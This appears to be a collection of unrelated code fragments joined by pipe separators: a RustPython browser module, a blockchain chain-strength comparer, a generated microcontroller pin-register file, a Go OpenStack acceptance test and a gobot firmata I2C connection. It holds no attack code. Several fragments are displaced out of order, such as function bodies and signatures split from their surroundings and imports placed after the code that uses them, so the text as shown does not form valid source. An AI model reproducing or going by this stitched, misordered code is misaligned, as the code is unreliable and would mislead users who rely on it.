fn browser_request_animation_frame(func: ArgCallable, vm: &VirtualMachine) -> PyResult {
use std::{cell::RefCell, rc::Rc};
// this basic setup for request_animation_frame taken from:
// https://rustwasm.github.io/wasm-bindgen/examples/request-animation-frame.html
let f = Rc::new(RefCell::new(None));
let g = f.clone();
let weak_vm = weak_vm(vm);
*g.borrow_mut() = Some(Closure::wrap(Box::new(move |time: f64| {
let stored_vm = weak_vm
.upgrade()
.expect("that the vm is valid from inside of request_animation_frame");
stored_vm.interp.enter(|vm| {
let func = func.clone();
let args = vec![vm.ctx.new_float(time)];
let _ = vm.invoke(&func, args);
let closure = f.borrow_mut().take();
drop(closure);
})
}) as Box<dyn Fn(f64)>));
let id = window()
.request_animation_frame(&js_sys::Function::from(
g.borrow().as_ref().unwrap().as_ref().clone(),
))
.map_err(|err| convert::js_py_typeerror(vm, err))?;
Ok(vm.ctx.new_int(id))
}
fn browser_cancel_animation_frame(id: i32, vm: &VirtualMachine) -> PyResult<()> {
window()
.cancel_animation_frame(id)
.map_err(|err| convert::js_py_typeerror(vm, err))?;
Ok(())
}
#[pyclass(module = "browser", name)]
#[derive(Debug, PyValue)]
struct Document {
doc: web_sys::Document,
}
#[pyimpl]
impl Document {
#[pymethod]
fn query(&self, query: PyStrRef, vm: &VirtualMachine) -> PyResult {
let elem = self
.doc
.query_selector(query.as_str())
.map_err(|err| convert::js_py_typeerror(vm, err))?
.map(|elem| Element { elem })
.into_pyobject(vm);
Ok(elem)
}
}
#[pyclass(module = "browser", name)]
#[derive(Debug, PyValue)]
struct Element {
elem: web_sys::Element,
}
#[pyimpl]
impl Element {
#[pymethod]
fn get_attr(
&self,
attr: PyStrRef,
default: OptionalArg<PyObjectRef>,
vm: &VirtualMachine,
) -> PyObjectRef {
match self.elem.get_attribute(attr.as_str()) {
Some(s) => vm.ctx.new_utf8_str(s),
None => default.unwrap_or_none(vm),
}
}
#[pymethod]
fn set_attr(&self, attr: PyStrRef, value: PyStrRef, vm: &VirtualMachine) -> PyResult<()> {
self.elem
.set_attribute(attr.as_str(), value.as_str())
.map_err(|err| convert::js_py_typeerror(vm, err))
}
}
fn browser_load_module(module: PyStrRef, path: PyStrRef, vm: &VirtualMachine) -> PyResult {
let weak_vm = weak_vm(vm);
let mut opts = web_sys::RequestInit::new();
opts.method("GET");
let request = web_sys::Request::new_with_str_and_init(path.as_str(), &opts)
.map_err(|err| convert::js_py_typeerror(vm, err))?;
let window = window();
let request_prom = window.fetch_with_request(&request);
let future = async move {
let val = JsFuture::from(request_prom).await?;
let response = val
.dyn_into::<web_sys::Response>()
.expect("val to be of type Response");
let text = JsFuture::from(response.text()?).await?;
let stored_vm = &weak_vm
.upgrade()
.expect("that the vm is valid when the promise resolves");
stored_vm.interp.enter(move |vm| {
let resp_text = text.as_string().unwrap();
let res = import_file(vm, module.as_str(), "WEB".to_owned(), resp_text);
match res {
Ok(_) => Ok(JsValue::null()),
Err(err) => Err(convert::py_err_to_js_err(vm, &err)),
}
})
};
Ok(PyPromise::from_future(future).into_object(vm))
}
pub fn make_module(vm: &VirtualMachine) -> PyObjectRef {
let ctx = &vm.ctx;
let document_class = Document::make_class(ctx);
let document = PyObject::new(
Document {
doc: window().document().expect("Document missing from window"),
},
document_class.clone(),
None,
);
let element = Element::make_class(ctx);
py_module!(vm, "_browser", {
"fetch" => named_function!(ctx, browser, fetch),
"request_animation_frame" => named_function!(ctx, browser, request_animation_frame),
"cancel_animation_frame" => named_function!(ctx, browser, cancel_animation_frame),
"Document" => document_class,
"document" => document,
"Element" => element,
"load_module" => named_function!(ctx, browser, load_module),
})
}
pub fn setup_browser_module(vm: &mut VirtualMachine) {
vm.add_native_module("_browser".to_owned(), Box::new(make_module));
vm.add_frozen(py_freeze!(dir = "Lib"));
}
|
import::import_file,
PyClassImpl, PyObject, PyObjectRef, PyResult, PyValue, VirtualMachine,
|
chain_strength_comparer.rs
|
use crate::blocks::BlockHeader;
use std::{cmp::Ordering, fmt::Debug};
pub trait ChainStrengthComparer: Debug {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering;
}
#[derive(Default, Debug)]
pub struct AccumulatedDifficultySquaredComparer {}
impl ChainStrengthComparer for AccumulatedDifficultySquaredComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
let a_val = a.total_accumulated_difficulty_inclusive_squared().unwrap_or_default();
let b_val = b.total_accumulated_difficulty_inclusive_squared().unwrap_or_default();
a_val.cmp(&b_val)
}
}
#[derive(Debug)]
pub struct ThenComparer {
before: Box<dyn ChainStrengthComparer + Send + Sync>,
after: Box<dyn ChainStrengthComparer + Send + Sync>,
}
impl ThenComparer {
pub fn new(
before: Box<dyn ChainStrengthComparer + Send + Sync>,
after: Box<dyn ChainStrengthComparer + Send + Sync>,
) -> Self
{
ThenComparer { before, after }
}
}
impl ChainStrengthComparer for ThenComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
match self.before.compare(a, b) {
Ordering::Equal => self.after.compare(a, b),
Ordering::Less => Ordering::Less,
Ordering::Greater => Ordering::Greater,
}
}
}
#[derive(Default, Debug)]
pub struct MoneroDifficultyComparer {}
impl ChainStrengthComparer for MoneroDifficultyComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
a.pow
.accumulated_monero_difficulty
.cmp(&b.pow.accumulated_monero_difficulty)
}
}
#[derive(Default, Debug)]
pub struct BlakeDifficultyComparer {}
impl ChainStrengthComparer for BlakeDifficultyComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
a.pow
.accumulated_blake_difficulty
.cmp(&b.pow.accumulated_blake_difficulty)
}
}
#[derive(Default, Debug)]
pub struct HeightComparer {}
impl ChainStrengthComparer for HeightComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
a.height.cmp(&b.height)
}
}
pub struct ChainStrengthComparerBuilder {
target: Option<Box<dyn ChainStrengthComparer + Send + Sync>>,
}
impl ChainStrengthComparerBuilder {
pub fn new() -> ChainStrengthComparerBuilder {
ChainStrengthComparerBuilder { target: None }
|
self.target = match self.target {
Some(t) => Some(Box::new(ThenComparer::new(t, inner))),
None => Some(inner),
};
self
}
pub fn by_accumulated_difficulty(self) -> Self {
self.add_comparer_as_then(Box::new(AccumulatedDifficultySquaredComparer::default()))
}
pub fn by_monero_difficulty(self) -> Self {
self.add_comparer_as_then(Box::new(MoneroDifficultyComparer::default()))
}
pub fn by_blake_difficulty(self) -> Self {
self.add_comparer_as_then(Box::new(BlakeDifficultyComparer::default()))
}
pub fn by_height(self) -> Self {
self.add_comparer_as_then(Box::new(HeightComparer::default()))
}
pub fn then(self) -> Self {
// convenience method for wording
self
}
pub fn build(self) -> Box<dyn ChainStrengthComparer + Send + Sync> {
self.target.unwrap()
}
}
pub fn strongest_chain() -> ChainStrengthComparerBuilder {
ChainStrengthComparerBuilder::new()
}
|
}
fn add_comparer_as_then(mut self, inner: Box<dyn ChainStrengthComparer + Send + Sync>) -> Self {
|
p0_8.rs
|
#[doc = "Reader of register P0_8"]
pub type R = crate::R<u32, super::P0_8>;
#[doc = "Writer for register P0_8"]
pub type W = crate::W<u32, super::P0_8>;
#[doc = "Register P0_8 `reset()`'s with value 0xa0"]
impl crate::ResetValue for super::P0_8 {
type Type = u32;
#[inline(always)]
fn reset_value() -> Self::Type {
0xa0
}
}
#[doc = "Selects pin function for pin P0\\[8\\]\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
pub enum FUNC_A {
#[doc = "0: General purpose digital input/output\r\n pin."]
P0_8 = 0,
#[doc = "1: I2S Transmit word select. It is driven by the master and received by the slave. Corresponds to the signal WS in the I2S-bus specification."]
I2S_TX_WS = 1,
#[doc = "2: Master In Slave Out for SSP1."]
SSP1_MISO = 2,
#[doc = "3: Match output for Timer 2, channel 2."]
T2_MAT2 = 3,
#[doc = "4: Event input 1 to Event Monitor/Recorder."]
RTC_EV1 = 4,
#[doc = "7: LCD data."]
LCD_VD_16 = 7,
}
impl From<FUNC_A> for u8 {
#[inline(always)]
fn from(variant: FUNC_A) -> Self {
variant as _
}
}
#[doc = "Reader of field `FUNC`"]
pub type FUNC_R = crate::R<u8, FUNC_A>;
impl FUNC_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> crate::Variant<u8, FUNC_A> {
use crate::Variant::*;
match self.bits {
0 => Val(FUNC_A::P0_8),
1 => Val(FUNC_A::I2S_TX_WS),
2 => Val(FUNC_A::SSP1_MISO),
3 => Val(FUNC_A::T2_MAT2),
4 => Val(FUNC_A::RTC_EV1),
7 => Val(FUNC_A::LCD_VD_16),
i => Res(i),
}
}
#[doc = "Checks if the value of the field is `P0_8`"]
#[inline(always)]
pub fn is_p0_8(&self) -> bool {
*self == FUNC_A::P0_8
}
#[doc = "Checks if the value of the field is `I2S_TX_WS`"]
#[inline(always)]
pub fn is_i2s_tx_ws(&self) -> bool {
*self == FUNC_A::I2S_TX_WS
}
#[doc = "Checks if the value of the field is `SSP1_MISO`"]
#[inline(always)]
pub fn is_ssp1_miso(&self) -> bool {
*self == FUNC_A::SSP1_MISO
}
#[doc = "Checks if the value of the field is `T2_MAT2`"]
#[inline(always)]
pub fn is_t2_mat2(&self) -> bool {
*self == FUNC_A::T2_MAT2
}
#[doc = "Checks if the value of the field is `RTC_EV1`"]
#[inline(always)]
pub fn is_rtc_ev1(&self) -> bool {
*self == FUNC_A::RTC_EV1
}
#[doc = "Checks if the value of the field is `LCD_VD_16`"]
#[inline(always)]
pub fn is_lcd_vd_16(&self) -> bool {
*self == FUNC_A::LCD_VD_16
}
}
#[doc = "Write proxy for field `FUNC`"]
pub struct FUNC_W<'a> {
w: &'a mut W,
}
impl<'a> FUNC_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: FUNC_A) -> &'a mut W {
unsafe { self.bits(variant.into()) }
}
#[doc = "General purpose digital input/output pin."]
#[inline(always)]
pub fn p0_8(self) -> &'a mut W {
self.variant(FUNC_A::P0_8)
}
#[doc = "I2S Transmit word select. It is driven by the master and received by the slave. Corresponds to the signal WS in the I2S-bus specification."]
#[inline(always)]
pub fn i2s_tx_ws(self) -> &'a mut W {
self.variant(FUNC_A::I2S_TX_WS)
}
#[doc = "Master In Slave Out for SSP1."]
#[inline(always)]
pub fn ssp1_miso(self) -> &'a mut W {
self.variant(FUNC_A::SSP1_MISO)
}
#[doc = "Match output for Timer 2, channel 2."]
#[inline(always)]
pub fn t2_mat2(self) -> &'a mut W {
self.variant(FUNC_A::T2_MAT2)
}
#[doc = "Event input 1 to Event Monitor/Recorder."]
#[inline(always)]
pub fn rtc_ev1(self) -> &'a mut W {
self.variant(FUNC_A::RTC_EV1)
}
#[doc = "LCD data."]
#[inline(always)]
pub fn lcd_vd_16(self) -> &'a mut W {
self.variant(FUNC_A::LCD_VD_16)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !0x07) | ((value as u32) & 0x07);
self.w
}
}
#[doc = "Selects function mode (on-chip pull-up/pull-down resistor control).\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
pub enum MODE_A {
#[doc = "0: Inactive (no pull-down/pull-up resistor\r\n enabled)."]
INACTIVE_NO_PULL_DO = 0,
#[doc = "1: Pull-down resistor enabled."]
PULL_DOWN_RESISTOR_E = 1,
#[doc = "2: Pull-up resistor enabled."]
PULL_UP_RESISTOR_ENA = 2,
#[doc = "3: Repeater mode."]
REPEATER_MODE_ = 3,
}
impl From<MODE_A> for u8 {
#[inline(always)]
fn from(variant: MODE_A) -> Self {
variant as _
}
}
#[doc = "Reader of field `MODE`"]
pub type MODE_R = crate::R<u8, MODE_A>;
impl MODE_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> MODE_A {
match self.bits {
0 => MODE_A::INACTIVE_NO_PULL_DO,
1 => MODE_A::PULL_DOWN_RESISTOR_E,
2 => MODE_A::PULL_UP_RESISTOR_ENA,
3 => MODE_A::REPEATER_MODE_,
_ => unreachable!(),
}
}
#[doc = "Checks if the value of the field is `INACTIVE_NO_PULL_DO`"]
#[inline(always)]
pub fn is_inactive_no_pull_do(&self) -> bool {
*self == MODE_A::INACTIVE_NO_PULL_DO
}
#[doc = "Checks if the value of the field is `PULL_DOWN_RESISTOR_E`"]
#[inline(always)]
pub fn is_pull_down_resistor_e(&self) -> bool {
*self == MODE_A::PULL_DOWN_RESISTOR_E
}
#[doc = "Checks if the value of the field is `PULL_UP_RESISTOR_ENA`"]
#[inline(always)]
pub fn is_pull_up_resistor_ena(&self) -> bool {
*self == MODE_A::PULL_UP_RESISTOR_ENA
}
#[doc = "Checks if the value of the field is `REPEATER_MODE_`"]
#[inline(always)]
pub fn is_repeater_mode_(&self) -> bool {
*self == MODE_A::REPEATER_MODE_
}
}
#[doc = "Write proxy for field `MODE`"]
pub struct MODE_W<'a> {
w: &'a mut W,
}
impl<'a> MODE_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: MODE_A) -> &'a mut W {
{
self.bits(variant.into())
}
}
#[doc = "Inactive (no pull-down/pull-up resistor enabled)."]
#[inline(always)]
pub fn inactive_no_pull_do(self) -> &'a mut W {
self.variant(MODE_A::INACTIVE_NO_PULL_DO)
}
#[doc = "Pull-down resistor enabled."]
#[inline(always)]
pub fn pull_down_resistor_e(self) -> &'a mut W {
self.variant(MODE_A::PULL_DOWN_RESISTOR_E)
}
#[doc = "Pull-up resistor enabled."]
#[inline(always)]
pub fn pull_up_resistor_ena(self) -> &'a mut W {
self.variant(MODE_A::PULL_UP_RESISTOR_ENA)
}
#[doc = "Repeater mode."]
#[inline(always)]
pub fn repeater_mode_(self) -> &'a mut W {
self.variant(MODE_A::REPEATER_MODE_)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x03 << 3)) | (((value as u32) & 0x03) << 3);
self.w
}
}
#[doc = "Hysteresis.\n\nValue on reset: 1"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum HYS_A {
#[doc = "0: Disable."]
DISABLE_ = 0,
#[doc = "1: Enable."]
ENABLE_ = 1,
}
impl From<HYS_A> for bool {
#[inline(always)]
fn from(variant: HYS_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `HYS`"]
pub type HYS_R = crate::R<bool, HYS_A>;
impl HYS_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> HYS_A {
match self.bits {
false => HYS_A::DISABLE_,
true => HYS_A::ENABLE_,
}
}
#[doc = "Checks if the value of the field is `DISABLE_`"]
#[inline(always)]
pub fn is_disable_(&self) -> bool {
*self == HYS_A::DISABLE_
}
#[doc = "Checks if the value of the field is `ENABLE_`"]
#[inline(always)]
pub fn is_enable_(&self) -> bool {
*self == HYS_A::ENABLE_
}
}
#[doc = "Write proxy for field `HYS`"]
pub struct HYS_W<'a> {
w: &'a mut W,
}
impl<'a> HYS_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: HYS_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Disable."]
#[inline(always)]
pub fn disable_(self) -> &'a mut W {
self.variant(HYS_A::DISABLE_)
}
#[doc = "Enable."]
#[inline(always)]
pub fn enable_(self) -> &'a mut W {
self.variant(HYS_A::ENABLE_)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 5)) | (((value as u32) & 0x01) << 5);
self.w
}
}
#[doc = "Invert input\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum INV_A {
#[doc = "0: Input not inverted (HIGH on pin reads as 1, LOW on pin\r\n reads as 0)."]
INPUT_NOT_INVERTED_ = 0,
#[doc = "1: Input inverted (HIGH on pin reads as 0, LOW on pin reads as\r\n 1)."]
INPUT_INVERTED_HIGH = 1,
}
impl From<INV_A> for bool {
#[inline(always)]
fn from(variant: INV_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `INV`"]
pub type INV_R = crate::R<bool, INV_A>;
impl INV_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> INV_A {
match self.bits {
false => INV_A::INPUT_NOT_INVERTED_,
true => INV_A::INPUT_INVERTED_HIGH,
}
}
#[doc = "Checks if the value of the field is `INPUT_NOT_INVERTED_`"]
#[inline(always)]
pub fn is_input_not_inverted_(&self) -> bool {
*self == INV_A::INPUT_NOT_INVERTED_
}
#[doc = "Checks if the value of the field is `INPUT_INVERTED_HIGH`"]
#[inline(always)]
pub fn is_input_inverted_high(&self) -> bool {
*self == INV_A::INPUT_INVERTED_HIGH
}
}
#[doc = "Write proxy for field `INV`"]
pub struct INV_W<'a> {
w: &'a mut W,
}
impl<'a> INV_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: INV_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Input not inverted (HIGH on pin reads as 1, LOW on pin reads as 0)."]
#[inline(always)]
pub fn input_not_inverted_(self) -> &'a mut W {
self.variant(INV_A::INPUT_NOT_INVERTED_)
}
#[doc = "Input inverted (HIGH on pin reads as 0, LOW on pin reads as 1)."]
#[inline(always)]
pub fn input_inverted_high(self) -> &'a mut W {
self.variant(INV_A::INPUT_INVERTED_HIGH)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 6)) | (((value as u32) & 0x01) << 6);
self.w
}
}
#[doc = "Glitch filter control\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum FILTER_A {
#[doc = "0: Noise pulses below approximately 10 ns are filtered\r\n out."]
ENABLED = 0,
#[doc = "1: No input filtering is done."]
DISABLED = 1,
}
impl From<FILTER_A> for bool {
#[inline(always)]
fn from(variant: FILTER_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `FILTER`"]
pub type FILTER_R = crate::R<bool, FILTER_A>;
impl FILTER_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> FILTER_A {
match self.bits {
false => FILTER_A::ENABLED,
true => FILTER_A::DISABLED,
}
}
#[doc = "Checks if the value of the field is `ENABLED`"]
#[inline(always)]
pub fn is_enabled(&self) -> bool {
*self == FILTER_A::ENABLED
}
#[doc = "Checks if the value of the field is `DISABLED`"]
#[inline(always)]
pub fn is_disabled(&self) -> bool {
*self == FILTER_A::DISABLED
}
}
#[doc = "Write proxy for field `FILTER`"]
pub struct FILTER_W<'a> {
w: &'a mut W,
}
impl<'a> FILTER_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: FILTER_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Noise pulses below approximately 10 ns are filtered out."]
#[inline(always)]
pub fn enabled(self) -> &'a mut W {
self.variant(FILTER_A::ENABLED)
}
#[doc = "No input filtering is done."]
#[inline(always)]
pub fn disabled(self) -> &'a mut W {
self.variant(FILTER_A::DISABLED)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 8)) | (((value as u32) & 0x01) << 8);
self.w
}
}
#[doc = "Driver slew rate\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum SLEW_A {
#[doc = "0: Standard mode, output slew rate control is enabled. More\r\n outputs can be switched simultaneously."]
STANDARD = 0,
#[doc = "1: Fast mode, slew rate control is disabled. Refer to the\r\n appropriate specific device data sheet for details."]
FAST = 1,
}
impl From<SLEW_A> for bool {
#[inline(always)]
fn from(variant: SLEW_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `SLEW`"]
pub type SLEW_R = crate::R<bool, SLEW_A>;
impl SLEW_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> SLEW_A {
match self.bits {
false => SLEW_A::STANDARD,
true => SLEW_A::FAST,
}
}
#[doc = "Checks if the value of the field is `STANDARD`"]
#[inline(always)]
pub fn is_standard(&self) -> bool {
*self == SLEW_A::STANDARD
}
#[doc = "Checks if the value of the field is `FAST`"]
#[inline(always)]
pub fn is_fast(&self) -> bool
|
}
#[doc = "Write proxy for field `SLEW`"]
pub struct SLEW_W<'a> {
w: &'a mut W,
}
impl<'a> SLEW_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: SLEW_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Standard mode, output slew rate control is enabled. More outputs can be switched simultaneously."]
#[inline(always)]
pub fn standard(self) -> &'a mut W {
self.variant(SLEW_A::STANDARD)
}
#[doc = "Fast mode, slew rate control is disabled. Refer to the appropriate specific device data sheet for details."]
#[inline(always)]
pub fn fast(self) -> &'a mut W {
self.variant(SLEW_A::FAST)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 9)) | (((value as u32) & 0x01) << 9);
self.w
}
}
#[doc = "Open-drain mode.\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum OD_A {
#[doc = "0: Disable."]
DISABLE_ = 0,
#[doc = "1: Open-drain mode enabled. This is not a true open-drain\r\n mode. Input cannot be pulled up above VDD."]
OPEN_DRAIN_MODE_ENAB = 1,
}
impl From<OD_A> for bool {
#[inline(always)]
fn from(variant: OD_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `OD`"]
pub type OD_R = crate::R<bool, OD_A>;
impl OD_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> OD_A {
match self.bits {
false => OD_A::DISABLE_,
true => OD_A::OPEN_DRAIN_MODE_ENAB,
}
}
#[doc = "Checks if the value of the field is `DISABLE_`"]
#[inline(always)]
pub fn is_disable_(&self) -> bool {
*self == OD_A::DISABLE_
}
#[doc = "Checks if the value of the field is `OPEN_DRAIN_MODE_ENAB`"]
#[inline(always)]
pub fn is_open_drain_mode_enab(&self) -> bool {
*self == OD_A::OPEN_DRAIN_MODE_ENAB
}
}
#[doc = "Write proxy for field `OD`"]
pub struct OD_W<'a> {
w: &'a mut W,
}
impl<'a> OD_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: OD_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Disable."]
#[inline(always)]
pub fn disable_(self) -> &'a mut W {
self.variant(OD_A::DISABLE_)
}
#[doc = "Open-drain mode enabled. This is not a true open-drain mode. Input cannot be pulled up above VDD."]
#[inline(always)]
pub fn open_drain_mode_enab(self) -> &'a mut W {
self.variant(OD_A::OPEN_DRAIN_MODE_ENAB)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 10)) | (((value as u32) & 0x01) << 10);
self.w
}
}
impl R {
#[doc = "Bits 0:2 - Selects pin function for pin P0\\[8\\]"]
#[inline(always)]
pub fn func(&self) -> FUNC_R {
FUNC_R::new((self.bits & 0x07) as u8)
}
#[doc = "Bits 3:4 - Selects function mode (on-chip pull-up/pull-down resistor control)."]
#[inline(always)]
pub fn mode(&self) -> MODE_R {
MODE_R::new(((self.bits >> 3) & 0x03) as u8)
}
#[doc = "Bit 5 - Hysteresis."]
#[inline(always)]
pub fn hys(&self) -> HYS_R {
HYS_R::new(((self.bits >> 5) & 0x01) != 0)
}
#[doc = "Bit 6 - Invert input"]
#[inline(always)]
pub fn inv(&self) -> INV_R {
INV_R::new(((self.bits >> 6) & 0x01) != 0)
}
#[doc = "Bit 8 - Glitch filter control"]
#[inline(always)]
pub fn filter(&self) -> FILTER_R {
FILTER_R::new(((self.bits >> 8) & 0x01) != 0)
}
#[doc = "Bit 9 - Driver slew rate"]
#[inline(always)]
pub fn slew(&self) -> SLEW_R {
SLEW_R::new(((self.bits >> 9) & 0x01) != 0)
}
#[doc = "Bit 10 - Open-drain mode."]
#[inline(always)]
pub fn od(&self) -> OD_R {
OD_R::new(((self.bits >> 10) & 0x01) != 0)
}
}
impl W {
#[doc = "Bits 0:2 - Selects pin function for pin P0\\[8\\]"]
#[inline(always)]
pub fn func(&mut self) -> FUNC_W {
FUNC_W { w: self }
}
#[doc = "Bits 3:4 - Selects function mode (on-chip pull-up/pull-down resistor control)."]
#[inline(always)]
pub fn mode(&mut self) -> MODE_W {
MODE_W { w: self }
}
#[doc = "Bit 5 - Hysteresis."]
#[inline(always)]
pub fn hys(&mut self) -> HYS_W {
HYS_W { w: self }
}
#[doc = "Bit 6 - Invert input"]
#[inline(always)]
pub fn inv(&mut self) -> INV_W {
INV_W { w: self }
}
#[doc = "Bit 8 - Glitch filter control"]
#[inline(always)]
pub fn filter(&mut self) -> FILTER_W {
FILTER_W { w: self }
}
#[doc = "Bit 9 - Driver slew rate"]
#[inline(always)]
pub fn slew(&mut self) -> SLEW_W {
SLEW_W { w: self }
}
#[doc = "Bit 10 - Open-drain mode."]
#[inline(always)]
pub fn od(&mut self) -> OD_W {
OD_W { w: self }
}
}
|
{
*self == SLEW_A::FAST
}
|
vlantransparent_test.go
|
//go:build acceptance || networking || vlantransparent
// +build acceptance networking vlantransparent
package v2
import (
"testing"
"github.com/nexclipper/gophercloud/acceptance/clients"
networkingv2 "github.com/nexclipper/gophercloud/acceptance/openstack/networking/v2"
"github.com/nexclipper/gophercloud/acceptance/tools"
"github.com/nexclipper/gophercloud/openstack/common/extensions"
th "github.com/nexclipper/gophercloud/testhelper"
)
func TestVLANTransparentCRUD(t *testing.T)
|
{
client, err := clients.NewNetworkV2Client()
th.AssertNoErr(t, err)
extension, err := extensions.Get(client, "vlan-transparent").Extract()
if err != nil {
t.Skip("This test requires vlan-transparent Neutron extension")
}
tools.PrintResource(t, extension)
// Create a VLAN transparent network.
network, err := CreateVLANTransparentNetwork(t, client)
th.AssertNoErr(t, err)
defer networkingv2.DeleteNetwork(t, client, network.ID)
tools.PrintResource(t, network)
// Update the created VLAN transparent network.
newNetwork, err := UpdateVLANTransparentNetwork(t, client, network.ID)
th.AssertNoErr(t, err)
tools.PrintResource(t, newNetwork)
// Check that the created VLAN transparent network exists.
vlanTransparentNetworks, err := ListVLANTransparentNetworks(t, client)
th.AssertNoErr(t, err)
var found bool
for _, vlanTransparentNetwork := range vlanTransparentNetworks {
if vlanTransparentNetwork.ID == network.ID {
found = true
}
}
th.AssertEquals(t, found, true)
}
|
|
firmata_i2c.go
|
package firmata
import (
// "gobot.io/x/gobot/drivers/i2c"
"gobot.io/x/gobot/platforms/firmata/client"
)
type firmataI2cConnection struct {
address int
adaptor *Adaptor
}
// NewFirmataI2cConnection creates an I2C connection to an I2C device at
// the specified address
func NewFirmataI2cConnection(adaptor *Adaptor, address int) (connection *firmataI2cConnection)
|
// Read tries to read a full buffer from the i2c device.
// Returns an empty array if the response from the board has timed out.
func (c *firmataI2cConnection) Read(b []byte) (read int, err error) {
ret := make(chan []byte)
if err = c.adaptor.Board.I2cRead(c.address, len(b)); err != nil {
return
}
c.adaptor.Board.Once(c.adaptor.Board.Event("I2cReply"), func(data interface{}) {
ret <- data.(client.I2cReply).Data
})
result := <-ret
copy(b, result)
read = len(result)
return
}
func (c *firmataI2cConnection) Write(data []byte) (written int, err error) {
var chunk []byte
for len(data) >= 16 {
chunk, data = data[:16], data[16:]
err = c.adaptor.Board.I2cWrite(c.address, chunk)
if err != nil {
return
}
written += len(chunk)
}
if len(data) > 0 {
err = c.adaptor.Board.I2cWrite(c.address, data[:])
written += len(data)
}
return
}
func (c *firmataI2cConnection) Close() error {
return nil
}
func (c *firmataI2cConnection) ReadByte() (val byte, err error) {
buf := []byte{0}
if _, err = c.Read(buf); err != nil {
return
}
val = buf[0]
return
}
func (c *firmataI2cConnection) ReadByteData(reg uint8) (val uint8, err error) {
if err = c.WriteByte(reg); err != nil {
return
}
return c.ReadByte()
}
func (c *firmataI2cConnection) ReadWordData(reg uint8) (val uint16, err error) {
if err = c.WriteByte(reg); err != nil {
